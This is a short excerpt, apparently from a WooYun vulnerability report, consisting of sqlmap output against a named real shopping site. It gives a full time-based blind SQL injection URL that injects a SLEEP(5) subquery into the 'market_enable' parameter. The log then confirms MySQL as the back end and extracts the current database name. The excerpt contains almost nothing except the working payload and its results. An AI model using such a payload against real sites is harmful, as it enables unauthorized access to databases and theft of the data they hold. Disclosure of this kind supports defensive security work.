WooYun.org

---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://hmall.huazhu.com:80/hmall/webapp/storeCatGoods!listStoreGoodsJson.do?disable=0&market_enable=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OYQx)&page=1&rows=10&store_id=16&_=1449301268455
---
[15:58:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[15:58:16] [INFO] fetching current database
[15:58:16] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[15:58:16] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                              
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
[15:59:57] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[16:00:17] [INFO] adjusting time delay to 4 seconds due to good response times
hmallb2c
current database:    'hmallb2c'
[16:04:09] [INFO] fetched data logged to text files under '/Users/farmer/.sqlmap/output/hmall.huazhu.com'
[*] shutting down at 16:04:09